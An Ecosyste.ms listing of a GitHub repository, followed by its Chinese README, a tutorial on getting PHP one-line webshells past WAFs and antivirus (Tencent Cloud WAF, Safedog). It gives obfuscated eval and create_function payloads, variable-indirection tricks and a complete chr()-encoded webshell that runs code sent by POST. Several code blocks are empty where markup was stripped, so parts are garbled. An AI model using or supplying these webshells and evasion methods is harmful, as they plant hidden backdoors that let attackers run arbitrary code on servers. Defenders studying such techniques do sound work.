Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/lcatro/php-webshell-bypass-waf
分享PHP WebShell 绕过WAF 的一些经验 Share some experience about PHP WebShell bypass WAF and Anti-AV
https://github.com/lcatro/php-webshell-bypass-waf
Last synced: 25 days ago
JSON representation
分享PHP WebShell 绕过WAF 的一些经验 Share some experience about PHP WebShell bypass WAF and Anti-AV
- Host: GitHub
- URL: https://github.com/lcatro/php-webshell-bypass-waf
- Owner: lcatro
- Created: 2017-10-11T02:01:57.000Z (about 7 years ago)
- Default Branch: master
- Last Pushed: 2017-10-30T03:35:58.000Z (about 7 years ago)
- Last Synced: 2024-08-03T18:11:36.983Z (4 months ago)
- Language: PHP
- Homepage:
- Size: 478 KB
- Stars: 288
- Watchers: 11
- Forks: 76
- Open Issues: 0
-
Metadata Files:
- Readme: readme.md
Awesome Lists containing this project
- awesome-webshell - **181**星
- awesome-security-collection - **181**星
README
### PHP-WebShell-Bypass-WAF
PHP WebShell 一句话的结构是:输入和执行,这是经典的PHP 一句话代码:
```PHP
```WebShell 的输入点在$_GET 和$_POST ,执行点在**eval()** ,经典的一句话WAF 都会拦截
测试:``
![](pic/php-eval-get.png)
测试:``
![](pic/php-get.png)
测试:``
![](pic/php-eval.png)
综合上面三点,可以发现WAF 是通过关键字来拦截的,把这三个测试用例放到安全狗下测试
![](pic/php-eval-get-safedog.png)
可以发现,安全狗是通过综合判断来识别WebShell 的,现在,我们有两种的绕过方式:关键字绕过和混淆绕过
### 关键字绕过
一般来说,WAF 里边的拦截规则都是使用了正则来匹配的,第一个绕过思路:**寻找WAF 拦截里边有没有匹配的关键字**
测试用例:``![](pic/tencent-WAF-assert-bypass.png)
测试用例:`');include%20'code.php';%20?>`
![](pic/tencent-WAF-include-bypass.png)
测试用例:``
![](pic/tencent-WAF-exec-bypass.png)
测试用例:``
![](pic/tencent-WAF-popen-bypass.png)
测试用例:``
![](pic/tencent-WAF-create_function-bypass.png)
思路1 总结:尽可能找到更多不被拦截的函数,然后用来测试
后来,这些关键字都被策略补上去了,接下来就使用混淆来绕过关键字检测
### 混淆绕过
`create_function()` 是比较有意思的函数,函数的原型为:[Link](http://php.net/manual/en/function.create-function.php)
```PHP
string create_function ( string $args , string $code )
```第一个参数是函数需要的参数列表,第二个参数为函数代码,最后会返回一个函数对象,然后再去调用.在构造代码的时候(构造第二个参数)可以有很多不同的混淆方法
```PHP
eval($_GET['test']);
```
通过很多不同种类的字符串变化成下面的例子
```PHP
'ev'.'al'.'($_G'.'ET['.'"test"]);'
strrev('$(lave').'_G'.'ET['.'"test"]);';
base64_decode('ZXZhbCgkX0dFVFsidGVzdCJdKTs=');
```这样的变化是非常多的,用云WAF 和安全狗测试一下:
```PHP
```![](pic/create_function_tencent-WAF.png)
![](pic/create_function_safedog.png)
腾讯云WAF 的策略是把`create_function()` 当作敏感函数拦截了,这三个WebShell 安全狗也都全部杀掉,先从安全狗开始尝试绕过.
首先使用一个空的`create_function()` 尝试看看安全狗有没有杀掉![](pic/create_function_safedog_nokill.png)
向`create_function()` 填充一些可以执行的代码,安全狗也没有杀.
![](pic/create_function_safedog_nokill2.png)
填充`eval($_GET['test'])` ,发现安全狗识别出WebShell
![](pic/create_function_safedog_kill.png)使用混淆`'ev'.'al'.'($_G'.'ET['.'"code"'.']);'` 也同样可以被识别
![](pic/create_function_safedog_kill2.png)
使用`strrev('ve').strrev('la').base64_decode('KCRfR0VUWw==').'"code"'.']);';` 也还是可以别识别
![](pic/create_function_safedog_kill3.png)
不过不要灰心,PHP 是很灵活的语言,变化的花样很多,试试这样写,就可以绕过安全狗的扫描了
![](pic/create_function_safedog_kill4.png)
做一句话WAF 绕过和免杀,一定要相信自己,AV 和WAF 除了用关键字和综合判断来识别WebShell ,终会有办法绕过的.现在过狗,接下来介绍一下间接调用函数与间接引用变量.
### 间接调用函数
PHP 里边有个语法是`$function='eval';` ,然后就可以直接对$function 变量进行函数调用,语法是`$function()`.基于这一点,我们回过头来绕过云WAF
Payload:
```PHP
```![](pic/tencent-WAF-create_function-bypass-remix.png)
### 间接调用变量
PHP 还有一个语法是`$$` 间接引用变量,比如:`$test=1234;$reference='test';echo $$reference;` 这样使用,reference 变量里边保存test 变量的名字,然后用符号$$ 即可引用到变量test .这样有什么意义呢?因为WAF 和AV 会通过$_GET ,$_POST 来判断WebShell ,不妨回到云WAF 再看看
![](pic/tencent-WAF-$_GET.png)
使用`$$` 来绕过,Payload 如下:
```PHP
会被拦截,所以去掉?> 即可绕过,由此判断是正则匹配,可以开开脑洞发挥一下绕过正则判断
```![](pic/tencent-WAF-$_GET-bypass.png)
这样就可以绕过对$_GET ,$_POST 的检测,同样,还有$_REQUESTS ,$_COOKIE
![](pic/tencent-WAF-$_COOKIE-bypass.png)
### 文末总结
到了这里,举一些不错的一句话木马来分析一下原理,推荐深入研究的读者访问这里[Link](https://github.com/tennc/webshell/tree/master/php)
1.
```PHP
```这个WebShell 使用到`array_map()` 和`ass\x65rt` ,array_map() 是调用函数的,第一个参数是即将要调用的函数名,这里`ass\x65rt` 使用了编码绕过,绕过了字符串判断,第二个参数是传递给这个函数的参数
2.
```PHP
$_uU=chr(99).chr(104).chr(114);$_cC=$_uU(101).$_uU(118).$_uU(97).$_uU(108).$_uU(40).$_uU(36).$_uU(95).$_uU(80).$_uU(79).$_uU(83).$_uU(84).$_uU(91).$_uU(49).$_uU(93).$_uU(41).$_uU(59);$_fF=$_uU(99).$_uU(114).$_uU(101).$_uU(97).$_uU(116).$_uU(101).$_uU(95).$_uU(102).$_uU(117).$_uU(110).$_uU(99).$_uU(116).$_uU(105).$_uU(111).$_uU(110);$_=$_fF("",$_cC);@$_();?>```
这个WebShell 使用到了间接引用函数,$_uU 重定向到chr() ,;$_cC 最后解码为`eval($_POST[1]);` ,$_fF 解码为`create_function` ,最后就是create_function 的调用过程,和php-shell-create_function.php 原理一样3.
未知攻,焉知防,这个是关于PHP Shell 的一句话检测脚本[Link](https://github.com/tennc/webshell/blob/master/php/pHp%E4%B8%80%E5%8F%A5%E8%AF%9D%E6%89%AB%E6%8F%8F%E8%84%9A%E6%9C%AC%E7%A8%8B%E5%BA%8F.php),很多绕过的思路都是在做防御的时候想到的,没有绝对的防御,甚至是看起来正确的思路在代码实现的过程中会存在Bug 导致分析或者识别失败.